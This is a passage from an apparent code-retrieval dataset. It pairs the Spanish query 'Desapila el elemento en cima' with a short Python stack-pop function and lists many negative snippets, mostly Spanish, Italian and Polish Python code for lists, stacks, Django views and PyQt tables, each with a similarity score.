t.uvozi()", "def get():", "def get():", "def Obtener_Lista(self):\n\t\treturn [self,self.Nombre+\" \"+self.Apellido,self.ID,self.Fecha, \n\t\tself.Edad,self.Test,self.Posicion,self.Prioridad,self.Progreso,self.Informe]", "def apilar(self, x):\n # Apilar es agregar al final de la lista.\n self.items.append(x)", "def __init__(self):\n mi_parqueo = list()", "def entrer(self):\n valeur = getattr(self.objet, self.attribut, None)\n if valeur is None:\n setattr(self.objet, self.attribut, [])", "def lista_offerte(request, legahash, astaid, numero=0):\n return lista_ultimi(request, legahash, astaid, Offerta, numero)", "def getObject(language=None):" ]
[ "0.60461986", "0.59805244", "0.59310794", "0.5646558", "0.5615027", "0.55744654", "0.5515526", "0.54436487", "0.5441662", "0.5441662", "0.54161835", "0.5410337", "0.5382265", "0.5358372", "0.53443366", "0.533257", "0.53211975", "0.53207725", "0.53205705", "0.53148395", "0.5314805", "0.5306073", "0.53059506", "0.53054386", "0.5296946", "0.52871656", "0.52854854", "0.5279527", "0.5273617", "0.5270526", "0.52677065", "0.5260744", "0.5260326", "0.525874", "0.52478606", "0.52429426", "0.5241005", "0.523606", "0.5226263", "0.5209008", "0.5197096", "0.5191959", "0.5191597", "0.5181888", "0.5162236", "0.51618314", "0.5159624", "0.51527685", "0.5143162", "0.5141274", "0.51330596", "0.51311195", "0.5128666", "0.512856", "0.51246554", "0.5112868", "0.5112868", "0.5112868", "0.5112868", "0.5112868", "0.5110996", "0.5106648", "0.5103515", "0.510114", "0.5099944", "0.509752", "0.5091084", "0.5089008", "0.50862306", "0.50603366", "0.50544196", "0.50509685", "0.50477564", "0.5034691", "0.5033437", "0.5031156", "0.5025442", "0.5025001", "0.50233954", "0.5018475", "0.50083655", "0.5004073", "0.4999509", "0.4981206", "0.4971638", "0.49657762", "0.49631628", "0.49573973", "0.49557543", "0.4953186", "0.495189", "0.49492344", "0.4941997", "0.4941997", "0.49378005", "0.49364358", "0.49340948", "0.49337396", "0.49336785", "0.49273163" ]
0.5313862
21
Desapila el elemento en cima
def desapilar(pila): dato = pila.datos[pila.tope] pila.tope -= 1 return dato
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def delete(self, *args, **kwargs):\n campo = Campostagimg.objects.filter(tag=self.tag, imagen=self.imagen)\n for c in campo:\n c.medidas = \"\"\n c.save()\n c.precision = 0\n c.save()\n c.v_esperado = \"\"\n c.save() \n\n super(Campos_defecto, self).delete(*args, **kwargs)", "def usar(self,letra):\n self.atril.remove(letra)", "def removeItem(self, valor):\n if not self.esta_vazia():\n ## Os dois ponteiros apontam pro primeiro elemento da lista\n elementoAnterior = self._cabeca\n elementoAtual = self._cabeca\n while True:\n ## Se o elemento for encontrado\n if elementoAtual._inteiro == valor:\n while elementoAtual._inteiro == valor:\n if elementoAtual == elementoAnterior:\n ## Se o elemento a ser removido é o primeiro\n self.removeInicio()\n elementoAnterior = self._cabeca\n elementoAtual = self._cabeca\n else:\n elementoAnterior._proximo = elementoAtual._proximo\n elementoAnterior._proximo._anterior = elementoAnterior\n elementoAtual = elementoAnterior._proximo\n if elementoAtual == self._cabeca:\n break\n break\n else:\n ## se o elemento não foi encontrado ainda\n if elementoAnterior != elementoAtual:\n ## Avança o ponteiro que marca o nó anterior apenas quando não é a primeira passagem\n ## do Loop (os dois ponteiros já estão diferentes)\n elementoAnterior = elementoAnterior._proximo\n ## de qualquer forma avança o ponteiro para o atual\n elementoAtual = elementoAtual._proximo\n ## Testar se o elemento buscado não existe\n if elementoAtual == self._cabeca:\n break\n return None", "def atender(self):\n\n if self.enfila>0: #Para que atiendan solamente si e que hay alguien en la fila\n\n self.enfila-=1\n self.fila.pop(0) #Saco primer elemento de la fila (Atienden al primer cliente)", "def eliminarDetalle(self):\n\n itemActual = self.tableFactura.currentItem()\n if itemActual == None:\n self.showMsjEstado(\"Debe seleccionar un item para dar de baja\")\n else:\n detalle = self.detallesTabla[itemActual.row()]\n for loteVenta in self.lotesVentas[detalle]:\n loteVenta[0].aumentarCantidad(loteVenta[1])\n loteVenta[0].modificar(self.sesion)\n detalle.eliminarLotesAsociados(self.sesion)\n detalle.bajaFisica(self.sesion)\n del self.lotesVentas[detalle]\n del self.data[itemActual.row()]\n self.tableFactura.hideRow(itemActual.row())\n self.actualizar()\n self.productosAgregados -=1\n self.objectModified.emit()", "def remove(self,producto):\n id_producto = str(producto.id)\n if id_producto in self.carro:\n del self.carro[id_producto]\n self.save()", "def __delitem__(self, i):\n if not (0 <= i < len(self)):\n raise IndexError(\"index en dehors de la plage admissible.\")\n\n if i == 0:\n self.supprimer_tete()\n return\n\n courante = self.tete\n\n for j in range(i - 1):\n courante = courante.suivante\n \n self._supprimer_apres(courante)", "def desaparecer(self,identificador_de_lista):\n self.mapa.delet_bomberman(identificador_de_lista)", "def elimnar_fila(self):\n button = self.sender()\n if button:\n row = self.tablaSincronizaciones.indexAt(button.pos()).row()\n contenido = self.tablaSincronizaciones.item(row, 0).text()\n Archivo_crontab.eliminar_sincronizacion(contenido)\n self.tablaSincronizaciones.removeRow(row)", "def _primerElem(l):\n return l[0]", "def cargarObra(self):\n rowActual=self.tableObra.currentItem().row()\n self.lineObra.setText(str(self.tableObra.item(rowActual,0).text()))\n self.lineCuit.setText(str(self.tableObra.item(rowActual,1).text()))\n self.tableObra.hide()\n self.lineObra.setEnabled(False)\n self.lineCuit.setEnabled(False)\n self.obraSocialSeleccionada = str(self.lineObra.text())\n self.cargar_productos(self.obraSocialSeleccionada)\n self.gbProducto.setVisible(True)", "def cliquer_sur_unité(self):", "def afficher(dico):\n return dico", "def eliminar(self):\n\n itemActual = self.tablePagos.currentItem()\n if itemActual == None:\n self.showMsjEstado(\"Debe seleccionar un para poder eliminar\")\n else:\n monto = self.detalles_cobro[itemActual.row()][1]\n del self.detalles_cobro[itemActual.row()]\n self.total_a_pagar += monto\n self.tablePagos.setRowHidden(itemActual.row(),True)\n self.actualizar_total()", "def cargar_atril(self,lista,bolsa):\n self.atril = lista\n self.bolsa = bolsa", "def usunPrzedmiot(self, przedmiot: str):\n self.przedmioty.pop(przedmiot,0) # jesli ze slownika to dodaje popa aby pokazac mu co usunac", "def marcarPunto(self):\n # Es primera vez que marco\n if self.tempSelected == None:\n # Capturo el ultimo elemento se se selecciono\n self.tempSelected = self.telaMAPA.find_withtag(self.elementoSeleccionado)\n # Lo Pinto\n self.telaMAPA.itemconfigure(self.elementoSeleccionado, fill=\"purple\")\n else:\n # Desmarco el anterior\n self.telaMAPA.itemconfigure(self.tempSelected, fill=\"white\")\n # Marco el nuevo\n self.tempSelected = self.telaMAPA.find_withtag(self.elementoSeleccionado)\n # Lo Pinto\n self.telaMAPA.itemconfigure(self.elementoSeleccionado, fill=\"purple\")", "def remove_diluciju(self, naziv):\n self.dilucijskeJedinice.pop(naziv, 0)", "def Imagenes_del_ahorcado(intento):\n HANGMANPICS = ['''\n +---+\n | |\n |\n |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n | |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n /| |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n /|\\ |\n |\n |\n=========''', '''\n +---+\n | |\n O |\n /|\\ |\n / |\n |\n=========''', '''\n +---+\n | |\n O |\n /|\\ |\n / \\ |\n |\n=========''']\n\n os.system(\"clear\")\n print(HANGMANPICS[intento])", "def obtenerObra(self):\n rowActual = self.tableOs.currentItem().row()\n self.lineRazon.setText(str(self.tableOs.item(rowActual,0).text()))\n self.lineRazon.setEnabled(False)\n self.obraSocial=str(self.tableOs.item(rowActual,0).text())\n self.lineCuit.setText(str(self.tableOs.item(rowActual,1).text()))\n self.lineCuit.setEnabled(False)\n self.tableOs.setEnabled(False)\n self.gbFactura.setEnabled(True)\n self.gbNotaCredito.setEnabled(True)", "def nuevo(self, ventana):\n self.objeto = ventana.objeto\n self.set_text(self.objeto.__str__())\n self.id = self.objeto.id\n self.modify_base(gtk.STATE_NORMAL, gtk.gdk.color_parse(\"#FFFFFF\"))\n ventana.destroy()\n self.busqueda.destroy()", "def retirer_objet(self, nom_membre):\n membre = self.get_membre(nom_membre)\n objet = membre.tenu\n membre.tenu = None", "def get_ostale_kanale(self, x):\n out = self.sviKanali\n out.remove(x)\n return out", "def mostrEmpl2(finalData): #Esta sección fue hecha por Ángel\n listaUE = []\n for elemento in finalData:\n nombre = elemento[0]\n listaUE.append(nombre) \n return listaUE", "def remove(self):", "def mezclar_bolsa(self):", "def retireSommet(self, sommet):\r\n nouveauGraphe = copy.deepcopy(self) # on effectue une copie du graphe\r\n nouveauGraphe.n = self.n-1 # On a n-1 points\r\n # NB: il faut aussi changer m et listeArretes mais on va pas le faire tout de suite car pas urgent\r\n # 1. On suprrime la ligne d'indice sommet\r\n #* AUTRE MÉTHODE del nouveauGraphe.adjMatrix[sommet]\r\n # print(nouveauGraphe.adjMatrix)\r\n nouveauGraphe.adjMatrix.pop(sommet)\r\n # print(nouveauGraphe.adjMatrix)\r\n #2. On supprime la colonne d'indice sommet = on supprime l'index sommet de chaque sous liste\r\n # la liste comprehension ne marche pas bien :(\r\n for line in nouveauGraphe.adjMatrix:\r\n line.pop(sommet)\r\n # print(nouveauGraphe.adjMatrix)\r\n # nouveauGraphe.m = 0\r\n # 2ème méthode:\r\n # for ligne in nouveauGraphe.adjMatrix:\r\n # ligne.pop(sommet)\r\n return nouveauGraphe", "def remove():", "def __init__(self, id, padre, hijos):\n\n self.__id = id\n self.__padre = padre\n self.__hijos = np.array([])\n for i in range(len(hijos)):\n newHijos = np.delete(hijos,i,0)#Se remueve el nodo de la lista una vez recorrido\n self.__hijos = np.append(self.__hijos, NodoCiudad(hijos[i],self,newHijos))", "def abrir(self):\n assert self.open == False\n self.ne = [n for n in self.ne]\n self.je = [e1 for e1 in self.je]\n self.ie = []\n self.open = True", "def remove_uredjaj(self, naziv):\n self.uredjaji.pop(naziv, 0)", "def cargar_bolsa(self,lista):\n self.bolsa = lista", "def on_btnLista_clicked(self,guardar):\n XerarInformes()", "def cerrar(self):\n assert self.open == True\n # convierto a numpy\n self.ne = np.array(self.ne, dtype=int)\n self.je = np.array(self.je, dtype=int)\n # calculo el ie (apunta a donde comienza cada elem0 en je)\n self.ie = np.zeros(self.num+1, dtype=int) # necesito tener num+1 porque el ultimo elem0 termina donde comenzaria un elem0 extra inexistente en num+1\n self.ie[self.num] = self.len_je # ultimo indice (len=instance.num+1, pero como es base-0, el ultimo tiene indice instance.num)\n for i0 in range(self.num-1, -1, -1): # recorro desde el ultimo elem0 (indice num-1) hasta el primer elem0 (indice 0)\n self.ie[i0] = self.ie[i0+1] - self.ne[i0] # para saber donde empieza cada elem0 voy restando el numero de elem1 de cada uno\n self.open = False", "def entrer(self):\n valeur = getattr(self.objet, self.attribut, None)\n if valeur is None:\n setattr(self.objet, self.attribut, [])", "def remove(self, z):\n if (z.getEsquerdo() is None) or (z.getDireito() is None):\n y = z\n else:\n y = self.sucessor(z)\n if y.getEsquerdo() is not None:\n x = y.getDireito()\n else:\n x = y.getDireito()\n if x is not None:\n x.setPai(y.getPai())\n if y.getPai() is None:\n self.setRaiz(x)\n else:\n if y == y.getPai().getEsquerdo():\n y.getPai().setEsquerdo(x)\n else:\n y.getPai().setDireito(x)\n\n if y != z:\n z.setChave(y.getChave())\n return y", "def reemplaza_tildes(palabra):", "def cancella_ultimi(request, legahash, astaid, Oggetto, numero=0):\n ultimi = ottieni_ultimi(astaid, Oggetto, numero)\n context = {'lista': ultimi}\n #ultimi.delete()\n for x in ultimi:\n\t x.delete()\n return HttpResponse(\"Cancellato/i!\")", "def compactar(memoria):\n\n encontrado = False\n partAux = [0, None]\n nuevoEsp = 0\n\n for part in memoria[:]:\n if part[1] == None:\n encontrado = True\n nuevoEsp += part[0]\n del memoria[memoria.index(part)]\n\n if encontrado:\n partAux[0] = nuevoEsp\n memoria.append(partAux)\n\n return memoria", "def first(self):\n if self.is_empty():\n raise Empty('La cola está vacía')\n return self._head._element # frente alineado con la cabeza de la lista", "def Devolver_estado(self,estado:list) -> None:\n\t\tfor i in range(6):\n\t\t\tfor j in range(6):\n\t\t\t\t#Usamos deepcopy para que el minimax o el alfabeta realice cambios en copias y no en el tablero\n\t\t\t\tself.tablero[i][j]=copy.deepcopy(estado[i][j])", "def retroceder(self):\n\t\tif self.pila_anteriores.esta_vacia(): \n\t\t\traise StopIteration(\"Esta al principio.\")\n\t\tself.actual = self.anterior\n\t\tself.anterior = self.pila_anteriores.desapilar()\n\t\tself.posicion -= 1\n\t\treturn self.actual.dato", "def __init__(self, lista_enlazada): \n\t\tself.lista = lista_enlazada\n\t\tself.anterior = None\n\t\tself.actual = lista_enlazada.prim\n\t\tself.pila_anteriores = Pila()\n\t\tself.posicion = 0", "def dodajPrzedmiot(self, przedmiot: Przedmiot):\n self.przedmioty[przedmiot.nazwa]=przedmiot", "def __init__(self):\n self.enfila= 0\n self.fila = []", "def __init__(self, nombre_depto, id_depto):\n self.nombre_depto = nombre_depto\n self.id_depto = id_depto\n self.empleados = []", "def eliminar(self, producto):\n\n producto_id = str(producto)\n\n if producto_id in self.carro:\n del self.carro[producto_id]\n self.guardar()", "def test_recupera_un_solo_elemento(self):\n detalle = reverse(\"musica:detail\", kwargs={\"pk\": self.musica1.id})\n respuesta = self.client.get(detalle)\n # print(respuesta.data['id'])\n self.assertEqual(200, respuesta.status_code)\n valor_consulta = Musica.objects.get(id=respuesta.data[\"id\"])\n # print(valor_consulta)\n self.assertEqual(respuesta.data[\"cancion\"], valor_consulta.cancion)\n self.assertEqual(respuesta.data[\"artista\"], valor_consulta.artista)\n self.assertEqual(respuesta.data[\"año\"], str(valor_consulta.año))", "def scrape_carteleraVIEJA(data, comp_nom):\t\n\t\n\tfunciones = []\n\tsoup = BeautifulSoup(data, convertEntities=BeautifulStoneSoup.HTML_ENTITIES)\n\tshow_exp = re.compile(r'sid=(\\d+)')\n\t\n\tcomplejo_org = Complejo.objects.get(nombre=comp_nom)\n\t\n\t#Busca complejo platino... en caso de existir:\n\tcomplejo_platino = complejo_org\n\t\n\t\n\tpeliculas = soup.find('table', cellspacing='0', cellpadding='0', border='0').contents[3:-1:2]\n\t\n\tfor peli in peliculas:\n\t\ttres_D = False\n\t\tidioma = None\n\t\t\n\t\t#Checar tiene logo de 3d\n\t\tif peli.find('div', 'icono_platino').find('img', src=re.compile(r'3d.png$')): tres_D = True\n\t\t\n\t\t#Encabezado contiene titulo e idioma\n\t\tencabezado = peli.find('li', 'texto_3', style='margin: 2px 0px 0px; float: left; width: 155px;')\n\t\ttitulo = ''.join(encabezado.findAll(text=True)).replace('\\n', '').strip()\n\t\t\n\t\t\n\t\t#Determina Idioma\n\t\tif encabezado.find('img', alt='idioma').get('src', '').find('ing') > 0:\n\t\t\tidioma = 'ingles'\n\t\telse:\n\t\t\tidioma = 'espanol'\n\t\t\n\t\ttit = '|'+ titulo + '|'\n\t\t#Buscar pelicula por titulo segun idioma y 3d.. subtitulada o no.\n\t\tpeli_query = Pelicula.objects.filter(alt_tit__icontains=tit, tres_D=tres_D)\n\t\tif len(peli_query) > 1:\n\t\t\t#Si idioma == ingles, selecciona la pelicula subtitulada\n\t\t\tpelicula = peli_query.filter(subtitulada= (idioma == 'ingles') )\n\t\telif len(peli_query) == 1:\n\t\t\tpelicula = peli_query[0]\n\t\telse:\n\t\t\tlogger.debug( \"No se encontro pelicula %s\" % titulo\t\t)\n\t\t\t\n\t\thoras_html = peli.find('div', id='horax')\n\t\tplatino_b= False\t\t\n\t\tfor tag in horas_html.contents:\n\t\t\t#Me salto todo lo que no es html\n\t\t\tif type(tag) != NavigableString:\t\t\n\t\t\t\t#En caso de que sea funciones de platino\n\t\t\t\tif tag.name == 'center':\n\t\t\t\t\tplatino_b = True\n\t\t\t\t\tfuncion_name = ''.join(tag.findAll(text=True)).strip()\n\t\t\t\t\tif funcion_name.find('Platino') > -1:\n\t\t\t\t\t\t#Ajustar el complejo para platino\n\t\t\t\t\t\tcomplejo = complejo_platino\n\t\t\t\t\t\t\n\t\t\t\telif tag.get('style','').find('border-bottom: 1px solid rgb(238, 207, 0);') > -1:\n\t\t\t\t\t#Ajustar de regreso el complejo normal\n\t\t\t\t\tcomplejo = complejo_org\n\t\t\t\t\tplatino_b = False\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t#Si es renglon de hora y no algo mas como <br/>\t\t\t\n\t\t\t\tif tag.name== 'div' and tag.get('id','') == 'general':\n\t\t\t\t\tfecha = parseDate(tag.find('div', id=fecha).string)\n\t\t\t\t\tfunciones.extend(\n\t\t\t\t\t\t[{\n\t\t\t\t\t\t\t'pelicula': pelicula,\n\t\t\t\t\t\t\t'complejo': complejo,\n\t\t\t\t\t\t\t'hora': datetime.datetime(fecha.year, fecha.month, fecha.day, *time.strptime( hora_html.string , '%H:%M')[3:5]),\n\t\t\t\t\t\t\t'pol_idShowTime': show_exp.search(hora_html['href']).group(1),\n\t\t\t\t\t\t\t} for hora_html in tag.find('div', id='funciones').find('a', 'texto_1')]\n\t\t\t\t\t\t\t\n\t\t\t\t\t\t)\n\t\t\t\t\t#logger.debug( funciones)\n\treturn funciones", "def __init__(self, id, n):\n\n hijos = np.delete(np.arange(n),id,0)#Se remueve el nodo de la lista una vez recorrido\n self.__raiz = NodoCiudad(id,None,hijos)", "def update_cola(self):\n self.listUsuarioAtentiendo.append(self.listUsuario[0])\n self.listUsuario.pop(0)\n self.cola -= 1", "def uvozi_podatke(tabele):\n for t in tabele:\n t.uvozi()", "def loeschen(self):\r\n loeschen=self.REQUEST['loeschen']\r\n tit=''\r\n i=0\r\n j=0\r\n index=[]\r\n cursor=[]\r\n for x in self.objectValues('Image'):\r\n if str(x.id())[0:6] not in index:\r\n index.append(str(x.id())[0:6]) \r\n cursor.append([str(x.id())[0:6],str(x.title),[str(x.id())]])\r\n if str(x.id())[0:6]==loeschen:\r\n tit=str(x.title)\r\n j=i\r\n i=i+1\r\n else:\r\n cursor[-1][2].append(str(x.id()))\r\n #for val in cursor[j][2]:\r\n #self._delOb(self, id=str(val))\r\n #delet=delet+str(val)+' '\r\n self.manage_delObjects(ids=cursor[j][2])\r\n return tit+' gel&ouml;scht !'", "def modoEliminarPuntos(self):\n self.option = 2\n self.btnADDpunto['bg'] = \"white\"\n self.btnEliminarPunto['bg'] = \"red\"\n self.btnModificarPunto['bg'] = \"white\"", "def revise():", "def sprawdz(lista):\n # do_usuniecia - lista zawierajaca indeksy pol ktore zostana usuniete z glownej listy\n do_usuniecia = []\n # petla przechodzaca po wartosciach\n for i in range(len(lista) / 2):\n # j - indeks wartosci dla poszczgolnego panstwa\n j = 2 * i + 1\n # k - indeks pod ktorym nie ma wartosci\n k = 0\n # sprawdzanie ktore elementy sa bez wartosci oraz dodawanie ich do listy do usuniecia\n for el in lista[j]:\n if el is None:\n # zastosowanie unikalnosci indeksow\n if not k in do_usuniecia:\n do_usuniecia.append(k)\n\n k += 1\n # sortowanie listy z indeksami do usuniecia w sposob rosnacy\n do_usuniecia.sort()\n # nowalista - lista zawierajaca statystyki dostepne dla wszystkich panstw odpowiednio [Lata],[Wartosc]\n nowalista = []\n for i in range(len(lista)):\n # wartosc - lista zawierajaca poszczegolne dane z glownej listy\n wartosc = []\n # dodawanie wartosci, ktore sa dostepne dla wszystkich panstw do tabeli wartosc\n for j in range(len(lista[i])):\n # zastosowanie unikalnosci indeksow dla ktorych nie ma wartosci\n if not j in do_usuniecia:\n wartosc.append(lista[i][j])\n # dodawanie listy zawierajacej wynik dla poszczegolnych danych\n nowalista.append(wartosc)\n\n return nowalista", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def clear(self):", "def cima(pila):\n return pila.datos[pila.tope]", "def apilar(self,dato):\r\n\t\tself.elementos.append(dato)\r\n\t\tself.len += 1", "def tomar_bolsa(self):\n return self.bolsa.pop()", "def cargarProductosSinObra(self):\n\n self.limpiarTabla(self.tableProductos)\n\n ##Cnsulta para obtener todos los productos del sistema, con su correspondiente\n ##codigo de barra, monodroga, descuento, importe\n query=self.sesion.query(ProductoModel.codigo_barra,ProductoModel.id_medicamento,ProductoModel.id_presentacion,MonodrogaModel.nombre,ProductoModel.importe).\\\n join(MedicamentoModel).filter(ProductoModel.id_medicamento==MedicamentoModel.nombre_comercial).\\\n join(MonodrogaModel).filter(MedicamentoModel.id_monodroga==MonodrogaModel.nombre).\\\n filter(ProductoModel.baja==False).order_by(ProductoModel.codigo_barra)\n\n ##Se cargan los datos obtenidos en la tabla de Producto\n for n, obj in enumerate(query):\n self.tableProductos.insertRow(n)\n self.tableProductos.setItem(n, 0, QtGui.QTableWidgetItem(str(obj[0])))\n self.tableProductos.setItem(n, 1, QtGui.QTableWidgetItem(str(obj[1])))\n self.tableProductos.setItem(n, 2, QtGui.QTableWidgetItem(str(obj[2])))\n self.tableProductos.setItem(n, 3, QtGui.QTableWidgetItem(str(obj[3])))\n self.tableProductos.setItem(n, 4, QtGui.QTableWidgetItem(str(0)))\n self.tableProductos.setItem(n, 5, QtGui.QTableWidgetItem(str(obj[4])))\n\n ##Se carga la cantidad de cada producto en la tabla\n for row,producto in enumerate(ProductoModel.buscarTodos(ProductoModel.codigo_barra,self.sesion)):\n self.tableProductos.setItem(row,6,QtGui.QTableWidgetItem(str(producto.getCantidad(self.sesion))))", "def agregar_bolsa(self, letra, cantidad):", "def __carta(soup):\n news = []\n container = soup.find('dd', id='fieldset-maisacessadas-semana')\n most_read = container.find_all('li')\n\n for item in most_read:\n news.append(dict(title=item.a.string, link=item.a['href']))\n return news", "def __carta(soup):\n news = []\n container = soup.find('dd', id='fieldset-maisacessadas-semana')\n most_read = container.find_all('li')\n\n for item in most_read:\n news.append(dict(title=item.a.string, link=item.a['href']))\n return news", "def actualizarLBI(produ,datInv,cant): # Esta sección fue hecha por Valeria \n datInv[produ][2] -= cant\n return datInv", "def clear_elements(self):\n\n pass", "def remove_element(self, element=None):\n pass", "def remove(self, elem):\n if self.inicio == None:\n raise ValueError(\"{} nao esta na lista\".format(elem))\n elif self.inicio.dado == elem:\n self.inicio = self.inicio.prox\n self._size = self._size - 1\n return True\n else:\n ancestor = self.inicio\n ponteiro = self.inicio.prox\n while ponteiro:\n if ponteiro.dado == elem:\n ancestor.prox = ponteiro.prox\n ponteiro.prox = None\n ancestor = ponteiro\n ponteiro = ponteiro.prox\n self._size = self._size - 1\n return True\n raise ValueError(\"{} nao esta na lista\".format(elem))", "def atender(self):\n\n if self.enfila>0:\n \n self.enfila-=1\n self.fila.pop(0)", "def test_f_eliminar_atributo(self):\n print '+++ Eliminacion de proyecto existente +++'\n borrar_request = self._eliminar_atributo(nombre)\n print '*-- datos de prueba ::: nombre = ' + str(nombre) +' --*'\n self.assertNotIn('Debe loguearse primeramente!!!!', borrar_request.data, 'No se ha logueado correctamente')\n self.assertNotIn('No posee los permisos suficientes para realizar la operacion', borrar_request.data, 'No tiene permisos para eliminar atributos')\n self.assertIn('El atributo ha sido eliminado con exito', borrar_request.data, 'Atributo no existe el nombre atributo')\n self.assertNotIn(str(nombre), borrar_request.data, 'El atributo no ha sido borrado')\n print '*-- Verificacion completa, se elimino correctamente--*'\n print '*---test 6 atributo---*'\n print '##----++++ FIN PRUEBA UNITARIA atributo ++++----##'", "def elems(self):", "def nouvellePartie(self):\n for i in range(0, 3):\n for j in range(0, 3):\n self.partie.uplateau[i, j].initialiser()\n self.canvas_uplateau[i, j].delete('pion')\n self.afficher_message(\" Nouvelle Partie\")", "def ustal_kon(self, f):\n kon= Kon.objects.using(settings.DBS(self.firma)).filter(id= f.nip_nabywcy)\n if kon:\n return kon[0]\n \n kon= Kon()\n \n # Numer dla zagranicznego\n nr_kon= Kon.objects.using(settings.DBS(self.firma)).exclude(nr_kon__startswith= 'Z').aggregate(Max('nr_kon'))\n kon.nr_kon= '{:05d}'.format(int(nr_kon['nr_kon__max'].strip())+1)\n\n if '/' in f.nazwa_nabywcy:\n kon.skrot, kon.nazwa= f.nazwa_nabywcy.split('/')\n else:\n kon.nazwa= f.nazwa_nabywcy\n \n kon.id= f.nip_nabywcy\n kon.idtyp= 'NIPUE' if re.match('[A-Z][A-Z]', f.nip_nabywcy) else 'NIP'\n kon.ulica, kon.kod, kon.miejsc= self.adres_kon(f.adres_nabywcy)\n \n kon.kraj= f.nip_nabywcy[:2] if re.match('[A-Z][A-Z]', f.nip_nabywcy) else 'PL'\n \n kon.id_obcy= f.id # zapamiętanie skąd się zwiął (faktura)\n \n kon.skrot= su(kon.skrot)\n kon.nazwa= su(kon.nazwa)\n kon.miejsc= su(kon.miejsc)\n kon.ulica= su(kon.ulica)\n \n kon.kiedy= datetime.date.today() # data utworzenia\n kon.data_us= kon.kiedy\n if f.termin_platnosci and f.data_wystawienia:\n kon.term_zap= (f.termin_platnosci - f.data_wystawienia).days\n \n kon.save(using= settings.DBS(self.firma))\n \n return kon", "def borrar_primero(self):\t\t\n\t\tif self.len == 0:\n\t\t\traise ValueError(\"Lista vacia\")\n\t\tdato = self.prim.dato\n\t\tself.prim = self.prim.prox\n\t\tself.len -= 1\n\t\treturn dato", "def buscarObra(self):\n razon_social = str(self.lineObra.text())\n cuit = str(self.lineCuit.text())\n data = self.getAllTabla(self.tableObra)\n\n if razon_social != \"\":\n dataRazon = filter(lambda x: x[0].upper() == razon_social.upper(), data.values())\n else:\n dataRazon = data.values()\n if cuit != \"\":\n dataCuit = filter(lambda x: x[1].upper() == cuit.upper(), dataRazon)\n else:\n dataCuit = dataRazon\n\n for dato in data:\n self.tableObra.setRowHidden(dato,False)\n\n for dato in data:\n if not data[dato] in dataCuit:\n self.tableObra.setRowHidden(dato,True)", "def remove_neighbor(self):\n self.fono -= 1", "def BorrarListas(self,evt):\n self.l_bal = []\n self.l_muestras = []\n self.l_vol = []\n self.l_den = []\n self.l_calidad = []\n self.idact = 0", "def uvozi(self, encoding=\"UTF-8\"):\n insert = self.stroskovno_mesto.dodajanje(stevilo=1)\n super().uvozi(encoding=encoding, insert=insert)", "def remove_cistiZrak(self, naziv):\n self.generatoriCistogZraka.pop(naziv, 0)", "def dessicate(self) -> None:\n self.vector = None", "def scraper_notizie(self, contenuto_articoli: list):\n tot_menzioni = []\n for articolo in contenuto_articoli:\n # estraggo qualsisasi frase che menziona il giocatore\n sel_regex = f\"[\\w ,;()'’-]+{self.name}[\\w ,;()'’-]+\"\n results = re.findall(sel_regex, articolo)\n\n for res in results:\n # rimuovo il caso in cui sia solo in un elenco, come ad inizio articoli su ATTACCO\n if not re.search(f\", {self.name},\", res):\n tot_menzioni.append(res)\n if len(tot_menzioni) > 0:\n self.news = \"• \" + \"<br>•\".join(tot_menzioni)", "def actualizar(self):\n if self.obraSocialSeleccionada!=None:\n self.cargar_productos(self.obraSocialSeleccionada)\n else:\n self.cargarProductosSinObra()", "def cellules(self): # itérateur rendu safe\n cellule_courante = self.tete\n while cellule_courante is not None:\n cellule_suivante = cellule_courante.suivant # sauvegarde\n yield cellule_courante\n cellule_courante = cellule_suivante # récupération de la sauvegarde", "def resetTree(self):\n for fila in self.verDatos.get_children():\n self.verDatos.delete(fila)", "def limpiarentry(fila):\n for i in range(len(fila)):\n fila[i].set_text('')", "def limpiarentry(fila):\n for i in range(len(fila)):\n fila[i].set_text('')", "def limpiarentry(fila):\n for i in range(len(fila)):\n fila[i].set_text('')", "def desplazamientox(tiempo,velocidad):\r\n #se realiza un operacion para encontrar el el desplzamiento horizaontal\r\n x=tiempo*velocidad\r\n #se regresa el valor de x\r\n return x", "def post_delete(self, *args, **kw):\n id_atributo = int(args[0])\n transaction.begin()\n attr = AtributosPorTipoItem.por_id(id_atributo)\n DBSession.delete(attr)\n transaction.commit()\n flash(\"Atributo Eliminado\")\n redirect(\"./\")", "def __init__(self):\n self.fondo = None", "def get(self, el):\n raise Exception('TODO IMPLEMENT ME !')", "def cargar_otras(self):\n\n stream_cargar = open ('yo_otros.txt', 'rt',encoding=\"utf-8\")\n datos=stream_cargar.readlines()\n \n # print(datos)\n # print (len(kasino.maquinas))\n\n lista_maquinas=[]\n lista_deco =[]\n day=\"\"\n money=\"\"\n\n contador=0\n dia_o_dinero=\"dia\"\n\n for i in datos[0]:\n # print(contador,i)\n if contador <8:\n lista_maquinas.append(i)\n contador+=1\n\n elif contador <17:\n lista_deco.append(i)\n contador+=1\n\n\n elif contador >= 17 and dia_o_dinero ==\"dia\":\n if i ==\"D\":\n pass\n elif i ==\"M\":\n dia_o_dinero=\"dinero\"\n else:\n day+=i\n elif contador >= 17 and dia_o_dinero == \"dinero\":\n money+=i\n \n \n\n # print(\"lm\",lista_maquinas)\n # print (\"ld\",lista_deco)\n # print(day,money)\n\n contador=0\n for i in kasino.maquinas:\n kasino.maquinas[i]=int(lista_maquinas[contador])\n contador+=1\n\n contador=0\n for i in kasino.decoracion:\n kasino.decoracion[i]=int(lista_deco[contador])\n contador+=1\n\n kasino.dia=int( day)\n kasino.dinero=int(money)", "def incarcaPieseMozaic(params):\n \n print('Incarcam piesele pentru mozaic din director.')\n\n pieseMozaic = []\n # for img_path in sorted(glob.glob(params.numeDirector\n # + '*.'\n # + params.tipImagine),\n # key=lambda name: int(name[len(params.numeDirector)\n # :-4])):\n for img_path in glob.glob(params.numeDirector\n + '*.'\n + params.tipImagine):\n img = cv2.imread(img_path)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n pieseMozaic.append(img)\n pieseMozaic = np.array(pieseMozaic)\n\n if params.afiseazaPieseMozaic:\n # afiseaza primele 100 de piese ale mozaicului\n if pieseMozaic.shape[0] < 100:\n raise Exception(\"Numarul de piese este mai mic decat 